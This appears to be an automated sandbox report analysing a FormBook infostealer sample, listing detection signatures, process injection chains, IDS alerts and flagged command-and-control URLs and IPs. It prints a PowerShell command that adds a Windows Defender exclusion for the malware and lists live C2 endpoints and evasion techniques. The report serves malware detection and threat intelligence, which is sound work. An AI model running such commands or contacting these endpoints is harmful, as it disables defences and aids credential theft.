Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oss4CtI8oz.exe

Overview

General Information

Sample name:oss4CtI8oz.exe
renamed because original name is a hash value
Original sample name:159b534ea3ff22efd020768a9e5bb7d2766cc9d3b0e483bbc74e59009c92aa8f.exe
Analysis ID:1634642
MD5:0e4890b8807a50f84df18d3632968765
SHA1:fe052bffa2f799a4548f4ccf1b7b106bbc802900
SHA256:159b534ea3ff22efd020768a9e5bb7d2766cc9d3b0e483bbc74e59009c92aa8f
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • oss4CtI8oz.exe (PID: 6728 cmdline: "C:\Users\user\Desktop\oss4CtI8oz.exe" MD5: 0E4890B8807A50F84DF18D3632968765)
    • powershell.exe (PID: 6192 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5264 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • RegSvcs.exe (PID: 5652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • DzuG1v7KGGzqI4w.exe (PID: 5792 cmdline: "C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\JlKNIEV12.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • finger.exe (PID: 4328 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • DzuG1v7KGGzqI4w.exe (PID: 2964 cmdline: "C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\XVecnrbU.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 4772 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 4700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1067799190.00000000012B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3337490870.0000000000B00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3336839914.0000000000850000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3337645809.0000000000B50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.1066763202.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oss4CtI8oz.exe", ParentImage: C:\Users\user\Desktop\oss4CtI8oz.exe, ParentProcessId: 6728, ParentProcessName: oss4CtI8oz.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe", ProcessId: 6192, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oss4CtI8oz.exe", ParentImage: C:\Users\user\Desktop\oss4CtI8oz.exe, ParentProcessId: 6728, ParentProcessName: oss4CtI8oz.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe", ProcessId: 6192, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oss4CtI8oz.exe", ParentImage: C:\Users\user\Desktop\oss4CtI8oz.exe, ParentProcessId: 6728, ParentProcessName: oss4CtI8oz.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe", ProcessId: 6192, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4700, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T02:48:22.485086+010028554651A Network Trojan was detected192.168.2.849690104.21.54.11280TCP
                2025-03-11T02:48:48.889996+010028554651A Network Trojan was detected192.168.2.850228103.42.144.2480TCP
                2025-03-11T02:49:02.061168+010028554651A Network Trojan was detected192.168.2.85023213.248.169.4880TCP
                2025-03-11T02:49:16.231708+010028554651A Network Trojan was detected192.168.2.85023613.248.169.4880TCP
                2025-03-11T02:49:40.479236+010028554651A Network Trojan was detected192.168.2.85024013.248.169.4880TCP
                2025-03-11T02:49:53.799930+010028554651A Network Trojan was detected192.168.2.850244209.74.77.23080TCP
                2025-03-11T02:50:08.253230+010028554651A Network Trojan was detected192.168.2.850248134.122.135.5480TCP
                2025-03-11T02:50:21.409192+010028554651A Network Trojan was detected192.168.2.85025213.248.169.4880TCP
                2025-03-11T02:50:42.934505+010028554651A Network Trojan was detected192.168.2.85025613.248.169.4880TCP
                2025-03-11T02:50:58.388557+010028554651A Network Trojan was detected192.168.2.850260111.119.219.19580TCP
                2025-03-11T02:51:11.799806+010028554651A Network Trojan was detected192.168.2.850264104.21.11.9980TCP
                2025-03-11T02:51:26.293930+010028554651A Network Trojan was detected192.168.2.850268157.112.187.7780TCP
                2025-03-11T02:51:41.258972+010028554651A Network Trojan was detected192.168.2.8502748.222.228.10780TCP
                2025-03-11T02:51:54.407342+010028554651A Network Trojan was detected192.168.2.8502783.33.130.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T02:48:41.229673+010028554641A Network Trojan was detected192.168.2.850224103.42.144.2480TCP
                2025-03-11T02:48:43.775133+010028554641A Network Trojan was detected192.168.2.850225103.42.144.2480TCP
                2025-03-11T02:48:46.323527+010028554641A Network Trojan was detected192.168.2.850227103.42.144.2480TCP
                2025-03-11T02:48:54.418709+010028554641A Network Trojan was detected192.168.2.85022913.248.169.4880TCP
                2025-03-11T02:48:56.968025+010028554641A Network Trojan was detected192.168.2.85023013.248.169.4880TCP
                2025-03-11T02:48:59.500145+010028554641A Network Trojan was detected192.168.2.85023113.248.169.4880TCP
                2025-03-11T02:49:07.586064+010028554641A Network Trojan was detected192.168.2.85023313.248.169.4880TCP
                2025-03-11T02:49:10.117091+010028554641A Network Trojan was detected192.168.2.85023413.248.169.4880TCP
                2025-03-11T02:49:12.666322+010028554641A Network Trojan was detected192.168.2.85023513.248.169.4880TCP
                2025-03-11T02:49:29.844220+010028554641A Network Trojan was detected192.168.2.85023713.248.169.4880TCP
                2025-03-11T02:49:32.408438+010028554641A Network Trojan was detected192.168.2.85023813.248.169.4880TCP
                2025-03-11T02:49:34.917190+010028554641A Network Trojan was detected192.168.2.85023913.248.169.4880TCP
                2025-03-11T02:49:46.132754+010028554641A Network Trojan was detected192.168.2.850241209.74.77.23080TCP
                2025-03-11T02:49:48.651086+010028554641A Network Trojan was detected192.168.2.850242209.74.77.23080TCP
                2025-03-11T02:49:51.281442+010028554641A Network Trojan was detected192.168.2.850243209.74.77.23080TCP
                2025-03-11T02:50:00.352846+010028554641A Network Trojan was detected192.168.2.850245134.122.135.5480TCP
                2025-03-11T02:50:03.084673+010028554641A Network Trojan was detected192.168.2.850246134.122.135.5480TCP
                2025-03-11T02:50:05.702620+010028554641A Network Trojan was detected192.168.2.850247134.122.135.5480TCP
                2025-03-11T02:50:13.750905+010028554641A Network Trojan was detected192.168.2.85024913.248.169.4880TCP
                2025-03-11T02:50:16.327058+010028554641A Network Trojan was detected192.168.2.85025013.248.169.4880TCP
                2025-03-11T02:50:18.867652+010028554641A Network Trojan was detected192.168.2.85025113.248.169.4880TCP
                2025-03-11T02:50:34.994004+010028554641A Network Trojan was detected192.168.2.85025313.248.169.4880TCP
                2025-03-11T02:50:37.597374+010028554641A Network Trojan was detected192.168.2.85025413.248.169.4880TCP
                2025-03-11T02:50:40.358368+010028554641A Network Trojan was detected192.168.2.85025513.248.169.4880TCP
                2025-03-11T02:50:50.124601+010028554641A Network Trojan was detected192.168.2.850257111.119.219.19580TCP
                2025-03-11T02:50:52.700959+010028554641A Network Trojan was detected192.168.2.850258111.119.219.19580TCP
                2025-03-11T02:50:55.247697+010028554641A Network Trojan was detected192.168.2.850259111.119.219.19580TCP
                2025-03-11T02:51:04.079624+010028554641A Network Trojan was detected192.168.2.850261104.21.11.9980TCP
                2025-03-11T02:51:06.636934+010028554641A Network Trojan was detected192.168.2.850262104.21.11.9980TCP
                2025-03-11T02:51:09.190152+010028554641A Network Trojan was detected192.168.2.850263104.21.11.9980TCP
                2025-03-11T02:51:18.638756+010028554641A Network Trojan was detected192.168.2.850265157.112.187.7780TCP
                2025-03-11T02:51:21.186963+010028554641A Network Trojan was detected192.168.2.850266157.112.187.7780TCP
                2025-03-11T02:51:23.724926+010028554641A Network Trojan was detected192.168.2.850267157.112.187.7780TCP
                2025-03-11T02:51:33.283117+010028554641A Network Trojan was detected192.168.2.8502708.222.228.10780TCP
                2025-03-11T02:51:35.848634+010028554641A Network Trojan was detected192.168.2.8502718.222.228.10780TCP
                2025-03-11T02:51:38.469166+010028554641A Network Trojan was detected192.168.2.8502738.222.228.10780TCP
                2025-03-11T02:51:46.742530+010028554641A Network Trojan was detected192.168.2.8502753.33.130.19080TCP
                2025-03-11T02:51:49.298740+010028554641A Network Trojan was detected192.168.2.8502763.33.130.19080TCP
                2025-03-11T02:51:51.839857+010028554641A Network Trojan was detected192.168.2.8502773.33.130.19080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: oss4CtI8oz.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/?eL7h=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaz3FYy7ZtcWTJr5uThofgj61z5iUNO0ndKyizlBAbSXj3dvw==&wp=Oz9XwzahdrAvira URL Cloud: Label: malware
                Source: http://www.warc.tech/hxn2/Avira URL Cloud: Label: malware
                Source: http://www.quo1ybjmkhdqljoz.top/ynw5/?eL7h=ZF/ThatktxT4IEpwfKsUOyQVHh5nHqomFNyY5ir4FklXSfOpwm6EfqJ4jyoelDA7A+pvc8dOI9DtdfL88IP+1kOCv+QPJBPSYWlpE+7rJT4XimcIjMNVjm2BzIrdTYhFEQ==&wp=Oz9XwzahdrAvira URL Cloud: Label: malware
                Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/Avira URL Cloud: Label: malware
                Source: http://www.warc.tech/hxn2/?eL7h=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FUlJM8pp5ZWnyQzjiEF0o+8f3DTsNGzDCqAFXqps7Otorhw==&wp=Oz9XwzahdrAvira URL Cloud: Label: malware
                Source: http://www.quo1ybjmkhdqljoz.top/ynw5/Avira URL Cloud: Label: malware
                Source: http://www.blogkart4u.xyz/36cg/?wp=Oz9Xwzahdr&eL7h=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqigWvF+W/duDuE7nAcq/mnuhXg7Y1Cc7r91JMMuzgajzb2w==Avira URL Cloud: Label: malware
                Source: http://www.blogkart4u.xyz/36cg/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: oss4CtI8oz.exeVirustotal: Detection: 77%Perma Link
                Source: oss4CtI8oz.exeReversingLabs: Detection: 73%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1067799190.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337490870.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336839914.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337645809.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1066763202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3342147165.00000000049E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3339789952.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1074125583.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: oss4CtI8oz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: oss4CtI8oz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: RegSvcs.exe, 00000004.00000002.1067580563.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3338837385.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.1068183881.0000000001320000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.0000000003150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1067736968.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1076390461.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.1068183881.0000000001320000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000007.00000002.3340212039.0000000003150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1067736968.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1076390461.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: LouH.pdb source: oss4CtI8oz.exe
                Source: Binary string: LouH.pdbSHA256HB source: oss4CtI8oz.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.992635700.00000000001EF000.00000002.00000001.01000000.0000000B.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144229567.00000000001EF000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: finger.pdbGCTL source: RegSvcs.exe, 00000004.00000002.1067580563.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3338837385.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0086CB70 FindFirstFileW,FindNextFileW,FindClose,7_2_0086CB70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax7_2_00859E40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then pop edi7_2_0085E6E6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h7_2_02E904CE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49690 -> 104.21.54.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50247 -> 134.122.135.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50229 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50256 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50230 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50257 -> 111.119.219.195:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50235 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50266 -> 157.112.187.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50224 -> 103.42.144.24:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50237 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50251 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50228 -> 103.42.144.24:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50250 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50255 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50268 -> 157.112.187.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50231 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50249 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50271 -> 8.222.228.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50264 -> 104.21.11.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50227 -> 103.42.144.24:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50241 -> 209.74.77.230:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50233 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50253 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50245 -> 134.122.135.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50275 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50234 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50225 -> 103.42.144.24:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50267 -> 157.112.187.77:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50240 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50258 -> 111.119.219.195:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50232 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50243 -> 209.74.77.230:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50239 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50261 -> 104.21.11.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50277 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50260 -> 111.119.219.195:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50238 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50263 -> 104.21.11.99:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50273 -> 8.222.228.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50244 -> 209.74.77.230:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50259 -> 111.119.219.195:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50278 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50252 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50236 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50270 -> 8.222.228.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50274 -> 8.222.228.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50262 -> 104.21.11.99:80
